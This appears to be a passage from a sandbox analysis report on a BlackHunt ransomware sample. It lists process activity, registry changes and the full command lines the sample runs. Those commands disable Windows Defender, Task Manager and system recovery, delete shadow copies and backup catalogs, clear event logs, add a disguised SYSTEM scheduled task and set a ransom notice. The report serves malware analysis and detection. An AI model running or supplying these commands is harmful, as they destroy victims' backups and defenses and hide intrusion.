44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 116 PID 4352 wrote to memory of 1916 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 116 PID 4352 wrote to memory of 3708 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 118 PID 4352 wrote to memory of 3708 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 118 PID 4352 wrote to memory of 4792 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 120 PID 4352 wrote to memory of 4792 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 120 PID 4352 wrote to memory of 2592 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 126 PID 4352 wrote to memory of 2592 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 126 PID 4352 wrote to memory of 1492 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 122 PID 4352 wrote to memory of 1492 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 122 PID 4352 wrote to memory of 2412 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 124 PID 4352 wrote to memory of 2412 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 124 PID 4352 wrote to memory of 4440 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 127 PID 4352 wrote to memory of 4440 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 127 PID 3552 wrote to memory of 4052 3552 cmd.exe 128 PID 3552 wrote to memory of 4052 3552 cmd.exe 128 PID 1612 wrote to memory of 4540 1612 cmd.exe 130 PID 1612 wrote to memory of 4540 1612 cmd.exe 130 PID 4352 wrote to memory of 2736 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 132 PID 4352 wrote to memory of 2736 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 132 PID 4352 wrote to memory of 4652 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 140 PID 4352 wrote to memory of 4652 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 140 PID 4352 wrote to memory of 4288 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 252 PID 4352 wrote to memory of 4288 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 252 PID 4352 wrote to memory of 4936 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 138 PID 4352 wrote to memory of 4936 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 138 PID 1488 wrote to memory of 1148 1488 cmd.exe 136 PID 1488 wrote to memory of 1148 1488 cmd.exe 136 PID 4352 wrote to memory of 1628 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 141 PID 4352 wrote to memory of 1628 4352 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe 141 PID 2264 wrote to memory of 2984 2264 cmd.exe 184 PID 2264 wrote to memory of 2984 2264 cmd.exe 184 PID 872 wrote to memory of 4972 872 Conhost.exe 143 PID 872 wrote to memory of 4972 872 Conhost.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe"C:\Users\Admin\AppData\Local\Temp\44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:3516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1176
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:1064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1916
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:3708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2412
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4288
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1628
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:5028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4068
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3604
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe" /F2⤵PID:1820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1176
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe" /F3⤵
- Creates scheduled task(s)
PID:4428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2128
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2032
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:4292
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2984
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2388
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:620
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4536
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1360
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:872
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Adds Run key to start application
PID:1064
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4388
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6836
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:13440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:13432
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13564
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:6600
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:13648
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:13924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:13168
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4740
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:13868
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:11284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:13980
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:12480
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:9820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7236
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:7024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:14028
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:13316
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:13396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:7344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:13756 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:5312
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\44a1bc0bf905a7b12f1b3b4292646a23105a767e3e776c09c1518da80b8f1877.exe"2⤵PID:4288
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:14164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:13780
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2212
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5944
-
